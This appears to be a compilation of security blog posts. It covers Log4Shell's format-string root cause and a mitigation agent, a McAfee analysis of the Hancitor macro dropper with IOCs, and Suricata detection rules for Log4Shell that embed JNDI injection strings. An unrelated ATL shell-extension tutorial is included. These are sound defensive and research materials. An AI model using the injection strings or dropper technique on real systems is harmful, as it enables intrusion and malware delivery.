sequences to remotely load (malicious) Java class files over the internet (CVE-2021-44228, “Log4Shell”). Right now, while the SREs are trying to apply the not-quite-a-fix official fix and/or implement egress filtering without knocking their employers off the internet, most people are either blaming log4j for even having this JNDI stuff in the first place and/or blaming the issue on a lack of support for the project that would have helped to prevent such a dangerous behavior from being so accessible. In reality, the JNDI stuff is regrettably more of an “enterprise” feature than one that developers would just randomly put in if left to their own devices. Enterprise Java is all about antipatterns that invoke code in roundabout ways to the point of obfuscation, and supporting ever more dynamic ways to integrate weird protocols like RMI to load and invoke remote code dynamically in weird ways. Even the log4j format “Interpolator” wraps a bunch of handlers, including the JNDI handler, in reflection wrappers. So, if anything, more “(financial) support” for the project would probably just lead to more of these kinds of things happening as demand for one-off formatters for new systems grows among larger users. Welcome to Enterprise Java Land, where they’ve already added log4j variable expansion for Docker and Kubernetes. Alas, the real problem is that log4j 2.x (the version basically everyone uses) is designed in such a way that all string arguments after the main format string for the logging call are also treated as format strings. Basically all log4j calls are equivalent to if the following C:
printf("%s\n", "clobbering some bytes %n");
were implemented as the very unsafe code below:
char *buf;
asprintf(&buf, "%s\n", "clobbering some bytes %n");
printf(buf);
Basically, log4j never got the memo about format string vulnerabilities and now it’s (probably) too late. It was only a matter of time until someone realized they exposed a magic format string directive that led to code execution (and even without the classloading part, it is still a means of leaking expanded variables out through other JNDI-compatible services, like DNS), and I think it may only be a matter of time until another dangerous format string handler gets introduced into log4j. Meanwhile, even without JNDI, if someone has access to your log4j output (wherever you send it), and can cause their input to end up in a log4j call (pretty much a given based on the current havoc playing out) they can systematically dump all sorts of process and system state into it including sensitive application secrets and credentials. Had log4j not implemented their formatting this way, then the JNDI issue would only impact applications that concatenated user input into the format string (a non-zero amount, but much less than 100%).
The “Fixes”
The main fix is to update to the just released log4j 2.16.0. Prior to that, the official mitigation from the log4j maintainers was:
“In releases >=2.10, this behavior can be mitigated by setting either the system property
Apache Log4jlog4j2.formatMsgNoLookups
or the environment variableLOG4J_FORMAT_MSG_NO_LOOKUPS
totrue
. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove theJndiLookup
class from the classpath:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
.”
So to be clear, the fix given for older versions of log4j (2.0-beta9 until 2.10.0) is to find and purge the JNDI handling class from all of your JARs, which are probably all-in-one fat JARs because no one uses classpaths anymore, all to prevent it from being loaded.
A tool to mitigate Log4Shell by disabling log4j JNDI
To try to make the situation a little bit more manageable in the meantime, we are releasing log4j-jndi-be-gone, a dead simple Java agent that disables the log4j JNDI handler outright. log4j-jndi-be-gone uses the Byte Buddy bytecode manipulation library to modify the at-issue log4j class’s method code and short circuit the JNDI interpolation handler. It works by effectively hooking the at-issue JndiLookup
class’ lookup()
method that Log4Shell exploits to load remote code, and forces it to stop early without actually loading the Log4Shell payload URL. It also supports Java 6 through 17, covering older versions of log4j that support Java 6 (2.0-2.3) and 7 (2.4-2.12.1), and works on read-only filesystems (once installed or mounted) such as in read-only containers.
The benefit of this Java agent is that a single command line flag can negate the vulnerability regardless of which version of log4j is in use, so long as it isn’t obfuscated (e.g. with proguard), in which case you may not be in a good position to update it anyway. log4j-jndi-be-gone is not a replacement for the -Dlog4j2.formatMsgNoLookups=true
system property in supported versions, but helps to deal with those older versions that don’t support it.
Using it is pretty simple, just add -javaagent:path/to/log4j-jndi-be-gone-1.0.0-standalone.jar
to your Java commands. In addition to disabling the JNDI handling, it also prints a message indicating that a log4j JNDI attempt was made with a simple sanitization applied to the URL string to prevent it from becoming a propagation vector. It also “resolves” any JNDI format strings to "(log4j jndi disabled)"
making the attempts a bit more grep-able.
$ java -javaagent:log4j-jndi-be-gone-1.0.0.jar -jar myapp.jar
log4j-jndi-be-gone is available from our GitHub repo, https://github.com/nccgroup/log4j-jndi-be-gone. You can grab a pre-compiled log4j-jndi-be-gone agent JAR from the releases page, or build one yourself with ./gradlew
, assuming you have a recent version of Java installed.
Remote ASLR Leak in Microsoft's RDP Client through Printer Cache Registry (CVE-2021-38665)
This is the second installment in my three-part series of articles on fuzzing Microsoft’s RDP client. I will explain a bug I found by fuzzing the printer sub-protocol, and how I exploited it.
- THALIUM
- Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)
This is the third installment in my three-part series of articles on fuzzing Microsoft’s RDP client, where I explain a bug I found by fuzzing the smart card extension.
HANCITOR DOC drops via CLIPBOARD
By Sriram P & Lakshya Mathur
Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method.
This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection.
Below (Figure 1) is the Geolocation based stats of Hancitor Malicious Doc observed by McAfee since September 2021
INFECTION CHAIN
- The victim will receive a Docusign-based phishing email.
- On clicking on the link (hxxp://mettlybothe.com/8/forum[.]php), a Word Document file is downloaded.
- On Enabling the macro content in Microsoft Word, the macro drops an embedded OLE, a password-protected macro-infected document file and launches it.
- This second Document file drops the main Hancitor DLL (Dynamic Link Library) payload.
- The DLL payload is then executed via rundll32.exe.
TECHNICAL ANALYSIS
Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.
Since the macros are disabled by default configuration, malware authors try to lure victims into believing that the file is from legitimate organizations or individuals and will ask victims to enable editing and content to start the execution of macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.
As soon as the victim enables editing, malicious macros are executed via the Document_Open function.
There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.
The loader VBA function, invoked by document_open, calls this random function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it will copy the selected OLE object to the clipboard. Once it is copied in the clipboard it will be dropped under %temp% folder.
When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.
In this case, the file was saved to the %temp% location with filename name “zoro.kl” as shown in the below screenshot (Fig 8). Fig 7 shows the corresponding procmon log involving the file write event.
Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.
This file is then opened with the built-in document method, Documents.open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords like “donttouchme”, etc.
This newly dropped doc is executed using the Documents.Open function (Figure 11).
Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.
It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).
Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.
MITRE ATT&CK
Technique ID | Tactic | Technique details |
T1566.002 | Initial Access | Spam mail with links |
T1204.001 | Execution | User Execution by opening the link. |
T1204.002 | Execution | Executing downloaded doc |
T1218 | Defense Evasion | Signed Binary Execution Rundll32 |
T1071 | C&C (Command & Control) | HTTP (Hypertext Transfer Protocol) protocol for communication |
IOC (Indicators Of Compromise)
Type | SHA-256 | Scanner | Detection Name |
Main Doc | 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c | WSS | W97M/Dropper.im |
Dropped Doc | c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e | WSS | W97M/Dropper.im
|
Dropped DLL | d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb | WSS | RDN/Hancitor |
URLs (Uniform Resource Locator) | hxxp://mettlybothe.com/8/forum[.]php | WebAdvisor | Blocked |
The post HANCITOR DOC drops via CLIPBOARD appeared first on McAfee Blog.
Log4Shell: Reconnaissance and post exploitation network detection
Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 14th at 13:00 UTC
About the Research and Intelligence Fusion Team (RIFT): RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.
In the wake of the CVE-2021-44228
(a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focused on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post.
This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) are provided. These IOC’s have been observed listening for incoming connections and are thus a useful for threat hunting.
Update Wednesday December 15th, 17:30 UTC
We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.
Our working hypothesis is that this is a derivative of the details shared yesterday – https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron.
The scale of the exposure globally appears significant.
We recommend all Mobile Iron users updated immediately.
Ivanti informed us that communication was sent over the weekend to MobileIron Core customers. Ivanti has provided mitigation steps of the exploit listed below on their Knowledge Base. Both NCC Group and Ivanti recommend all customers immediately apply the mitigation within to ensure their environment is protected.
Update Tuesday December 14th, 13:00 UTC
Log4j-finder: finding vulnerable versions of Log4j on your systems
RIFT has published a Python 3 script that can be run on endpoints to check for the presence of vulnerable versions of Log4j. The script requires no dependencies and supports recursively checking the filesystem and inside JAR files to see if they contain a vulnerable version of Log4j. This script can be of great value in determining which systems are vulnerable, and where this vulnerability stems from. The script will be kept up to date with ongoing developments.
It is strongly recommended to run host based scans for vulnerable Log4j versions. Whereas network-based scans attempt to identify vulnerable Log4j versions by attacking common entry points, a host-based scan can find Log4j in unexpected or previously unknown places.
The script can be found on GitHub: https://github.com/fox-it/log4j-finder
JNDI ExploitKit exposes larger attack surface
As shown by the release of an update JNDI ExploitKIT it is possible to reach remote code execution through serialized payloads instead of referencing a Java .class
object in LDAP and subsequently serving that to the vulnerable system. While TrustURLCodebase
defaults to false
in newer Java versions (6u211, 7u201, 8u191, and 11.0.1) and therefore prevents the LDAP reference vector,depending on the loaded libraries in the vulnerable application it is possible to execute code through Java serialization via both rmi and ldap.
Beware: Centralized logging can result in indirect compromise
This is also highly relevant for organisations using a form of centralised logging. Centralised logging can be used to collect and parse the received logs from the different services and applications running in the environment. We have identified cases where a Kibana server was not exposed to the Internet but because it received logs from several appliances it still got hit by the Log4Shell RCE and started to retrieve Java objects via LDAP.
We were unable to determine if this was due to Logstash being used in the background for parsing the received logs, but this stipulates the importance of checking systems configured with centralised logging solutions for vulnerable versions of Log4j, and not rely on the protection of newer JDK versions that has com.sun.jndi.ldap.object.trustURLCodebase
com.sun.jndi.rmi.object.trustURLCodebase
set to false
by default.
A warning concerning possible post-exploitation
Although largely eclipsed by Log4Shell, last weekend also saw the emergence of details concerning two vulnerabilities (CVE-2021-42287
and CVE-2021-42278
) that reside in the Active Directory component of Microsoft Windows Server editions. Due to the nature of these vulnerabilities, an attackers could escalate their privileges in a relatively easy manner as these vulnerabilities have already been weaponised.
It is therefore advised to apply the patches provided by Microsoft in the November 2021 security updates to every domain controller that is residing in the network as it is a possible form of post-exploitation after Log4Shell were to be successfully exploited.
Background
Since Log4J is used by many solutions there are significant challenges in finding vulnerable systems and any potential compromise resulting from exploitation of the vulnerability. JNDI (Java Naming and Directory Interface) was designed to allow distributed applications to look up services in a resource-independent manner, and this is exactly where the bug resulting in exploitation resides. The nature of JNDI allows for defense-evading exploitation attempts that are harder to detect through signatures. An additional problem is the tremendous amount of scanning activity that is currently ongoing. Because of this, investigating every single exploitation attempt is in most situations unfeasible. This means that distinguishing scanning attempts from actual successful exploitation is crucial.
In order to provide detection coverage for CVE-2021-44228
, NCC Group’s RIFT first created a ruleset that covers as many as possible ways of attempted exploitation of the vulnerability. This initial coverage allowed the collection of Threat Intelligence for further investigation. Most adversaries appear to use a different IP to scan for the vulnerability than they do for listening for incoming victim machines. IOC’s for listening IP’s / domains are more valuable than those of scanning IP’s. After all a connection from an environment to a known listening IP might indicate a successful compromise, whereas a connection to a scanning IP might merely mean that it has been scanned.
After establishing this initial coverage, our focus shifted to detecting successful exploitation in real time. This can be done by monitoring for rogue JRMI or LDAP requests to external servers. Preferably, this sort of behavior is detected in a port-agnostic way as attackers may choose arbitrary ports to listen on. Moreover, currently a full RCE chain requires the victim machine to retrieve a Java class file from a remote server (caveat: unless exfiltrating sensitive environment variables). For hunting purposes we are able to hunt for inbound Java classes. However, if coverage exists for incoming attacks we are also able to alert on an inbound Java class in a short period of time after an exploitation attempt. The combination of inbound exploitation attempt and inbound Java class is a high confidence IOC that a successful connection has occurred.
This blogpost will continue twofold: we will first provide a set of suricata rules that can be used for:
- Detecting incoming exploitation attempts;
- Alerting on higher confidence indicators that successful exploitation has occurred;
- Generating alerts that can be used for hunting
After providing these detection rules, a list of IOC’s is provided.
Detection Rules
Some of these rules are redundant, as they’ve been written in rapid succession.
# Detects Log4j exploitation attempts | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;) | |
# Better and stricter rules, also detects evasion techniques | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Hi; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Ui; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;) | |
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Pi; flowbits:set, fox.apachelog4j.rce.strict; xbits:set,fox.log4shell.attempt,track ip_dst,expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;) |
Detecting outbound connections to probing services
Connections to outbound probing services could indicate a system in your network has been scanned and subsequently connected back to a listening service. This could indicate that a system in your network is/was vulnerable and has been scanned.
# Possible successful interactsh probe | |
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT – Webattack – Possible successful InteractSh probe observed"; flow:established, to_client; content:"200"; http_stat_code; content:"<html><head></head><body>"; http_server_body; fast_pattern; pcre:"/[a-z0-9]{30,36}<\/body><\/html>/QR"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:misc-attack; reference:url, github.com/projectdiscovery/interactsh; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003712; rev:1;) | |
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – DNS query for interactsh.com server observed"; flow:stateless; dns_query; content:".interactsh.com"; fast_pattern; pcre:"/[a-z0-9]{30,36}\.interactsh\.com/"; threshold:type limit, track by_src, count 1, seconds 3600; reference:url, github.com/projectdiscovery/interactsh; classtype:bad-unknown; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003713; rev:1;) | |
# Detecting DNS queries for dnslog[.]cn | |
alert dns any any -> any 53 (msg:"FOX-SRT – Suspicious – dnslog.cn DNS Query Observed"; flow:stateless; dns_query; content:"dnslog.cn"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-12-10; metadata:ids suricata; priority:2; sid:21003729; rev:1;) | |
# Connections to requestbin.net | |
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – requestbin.net DNS Query Observed"; flow:stateless; dns_query; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003685; rev:1;) | |
alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"FOX-SRT – Suspicious – requestbin.net in SNI Observed"; flow:established, to_server; tls_sni; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003686; rev:1;) |
Detecting possible successful exploitation
Outbound LDAP(S) / RMI connections are highly uncommon but can be caused by successful exploitation. Inbound Java can be suspicious, especially if it is shortly after an exploitation attempt.
# Detects possible successful exploitation of Log4j | |
# JNDI LDAP/RMI Request to External | |
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)"; flow:established, to_server; dsize:14; content:"|02 01 03 04 00 80 00|"; offset:7; isdataat:!1, relative; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; metadata:created_at 2021-12-11; sid:21003738; rev:2;) | |
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JRMI Request to External Observed (CVE-2021-44228)"; flow:established, to_server; content:"JRMI"; depth:4; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; reference:url, https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html; metadata:created_at 2021-12-11; sid:21003739; rev:1;) | |
# Detecting inbound java shortly after exploitation attempt | |
alert tcp any any -> $HOME_NET any (msg: "FOX-SRT – Exploit – Java class inbound after CVE-2021-44228 exploit attempt (xbit)"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:40; fast_pattern; xbits:isset, fox.log4shell.attempt, track ip_dst; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:successful-user; priority:1; metadata:ids suricata; metadata:created_at 2021-12-12; sid:21003741; rev:1;) |
Hunting rules (can yield false positives)
Wget and cURL to external hosts was observed to be used by an actor for post-exploitation. As cURL and Wget are also used legitimately, these rules should be used for hunting purposes. Also note that attackers can easily change the User-Agent but we have not seen that in the wild yet. Outgoing connections after Log4j exploitation attempts can be tracked to be later hunted on although this rule can generate false positives if victim machine makes outgoing connections regularly. Lastly, detecting inbound compiled Java classes can also be used for hunting.
# Outgoing connection after Log4j Exploit Attempt (uses xbit from sid: 21003734) – requires `stream.inline=yes` setting in suricata.yaml for this to work | |
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Suspicious – Possible outgoing connection after Log4j Exploit Attempt"; flow:established, to_server; xbits:isset, fox.log4shell.attempt, track ip_src; stream_size:client, =, 1; stream_size:server, =, 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:bad-unknown; metadata:ids suricata; metadata:created_at 2021-12-12; priority:3; sid:21003740; rev:1;) | |
# Detects inbound Java class | |
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "FOX-SRT – Suspicious – Java class inbound"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:20; fast_pattern; threshold:type limit, track by_dst, count 1, seconds 43200; metadata:ids suricata; metadata:created_at 2021-12-12; classtype:bad-unknown; priority:3; sid:21003742; rev:2;) |
Indicators of Compromise
This list contains Domains and IP’s that have been observed to listen for incoming connections. Unfortunately, some adversaries scan and listen from the same IP, generating a lot of noise that can make threat hunting more difficult. Moreover, as security researchers are scanning the internet for the vulnerability as well, it could be possible that an IP or domain is listed here even though it is only listening for benign purposes.
References
General references
- Fox-IT / NCC Group actively participates in a continuously updated reddit thread: https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Mitigation:
Attack surface:
Known vulnerable services / products which use log4j:
- https://github.com/YfryTchsGD/Log4jAttackSurface
- https://mvnrepository.com/artifact/log4j/log4j/usages
Hashes of vulnerable products (beware, 2.15 of Log4J is included):
Icon Handler with ATL
One of the exercises I gave at the recent COM Programming class was to build an Icon Handler that integrates with the Windows Shell, where DLLs should have an icon based on their “bitness” – whether they’re 64-bit or 32-bit Portable Executable (PE).
The Shell provides many opportunities for extensibility. An Icon Handler is one of the simplest, but still requires writing a full-fledged COM component that implements certain interfaces that the shell expects. Here is the result of using the Icon Handler DLL, showing the folders c:\Windows\System32 and c:\Windows\SysWow64 (large icons for easier visibility).
Let’s see how to build such an icon handler. The full code is at zodiacon/DllIconHandler.
The first step is to create a new ATL project in Visual Studio. I’ll be using Visual Studio 2022, but any recent version would work essentially the same way (e.g. VS 2019, or 2017). Locate the ATL project type by searching in the terrible new project dialog introduced in VS 2019 and still horrible in VS 2022.
ATL (Active Template Library) is certainly not the only way to build COM components. “Pure” C++ would work as well, but ATL provides all the COM boilerplate such as the required exported functions, class factories, IUnknown
implementations, etc. Since ATL is fairly “old”, it lacks the elegance of other libraries such as WRL and WinRT, as it doesn’t take advantage of C++11 and later features. Still, ATL has withstood the test of time, is robust, and full featured when it comes to COM, something I can’t say for these other alternatives.
If you can’t locate the ATL project, you may not have ATL installed propertly. Make sure the C++ Desktop development workload is installed using the Visual Studio Installer.
Click Next and select a project name and location:
Click Create to launch the ATL project wizard. Leave all defaults (Dynamic Link Library) and click OK. Shell extensions of all kinds must be DLLs, as these are loaded by Explorer.exe. It’s not ideal in terms of Explorer’s stability, as aun unhandled exception can bring down the entire process, but this is necessary to get good performance, as no inter-process calls are made.
Two projects are created, named DllIconHandler and DllIconHandlerPS. The latter is a proxy/stub DLL that maybe useful if cross-apartment COM calls are made. This is not needed for shell extensions, so the PS project should simply be removed from the solution.
A detailed discussion of COM is way beyond the scope of this post.
The remaining project contains the COM DLL required code, such as the mandatory exported function, DllGetClassObject
, and the other optional but recommended exports (DllRegisterServer
, DllUnregisterServer
, DllCanUnloadNow
and DllInstall
). This is one of the nice benefits of working with ATL project for COM component development: all the COM boilerplate is implemented by ATL.
The next step is to add a COM class that will implement our icon handler. Again, we’ll turn to a wizard provided by Visual Studio that provides the fundamentals. Right-click the project and select Add Item… (don’t select Add Class as it’s not good enough). Select the ATL node on the left and ATL Simple Object on the right. Set the name to something like IconHandler:
Click Add. The ATL New Object wizard opens up. The name typed in the Add New Item dialog is used as a basis for generating names for source code elements (like the C++ class) and COM elements (that would be written into the IDL file and the resulting type library). Since we’re not going to define a new interface (we need to implement explorer-defined interfaces), there is no real need to tweak anything. You can click Finish to generate the class.
Three files are added with this last step: IconHandler.h
, IconHandler.cpp
and IconHandler.rgs
. The C++ source files role is obvious – implementing the Icon Handler. The rgs
file contains a script in an ATL-provided “language” indicating what information to write to the Registry when this DLL is registered (and what to remove if it’s unregistered).
The IDL (Interface Definition Language) file has also been modified, adding the definitions of the wizard generated interface (which we don’t need) and the coclass. We’ll leave the IDL alone, as we do need it to generate the type library of our component because the ATL registration code uses it internally.
If you look in IconHandler.h
, you’ll see that the class implements the IIconHandler
empty interface generated by the wizard that we don’t need. It even derives from IDispatch
:
class ATL_NO_VTABLE CIconHandler : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CIconHandler, &CLSID_IconHandler>, public IDispatchImpl<IIconHandler, &IID_IIconHandler, &LIBID_DLLIconHandlerLib, /*wMajor =*/ 1, /*wMinor =*/ 0> {
We can leave the IDispatchImpl
-inheritance, since it’s harmless. But it’s useless as well, so let’s delete it and also delete the interfaces IIconHandler
and IDispatch
from the interface map located further down:
class ATL_NO_VTABLE CIconHandler : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CIconHandler, &CLSID_IconHandler> { public: BEGIN_COM_MAP(CIconHandler) END_COM_MAP()
(I have rearranged the code a bit). Now we need to add the interfaces we truly have to implement for an icon handler: IPersistFile
and IExtractIcon
. To get their definitions, we’ll add an #include
for <shlobj_core.h>
(this is documented in MSDN). We add the interfaces to the inheritance hierarchy, the COM interface map, and use the Visual Studio feature to add the interface members for us by right-clicking the class name (CIconHandler
), pressing Ctrl+. (dot) and selecting Implement all pure virtuals of CIconHandler. The resulting class header looks something like this (some parts omitted for clarity) (I have removed the virtual keyword as it’s inherited and doesn’t have to be specified in derived types):
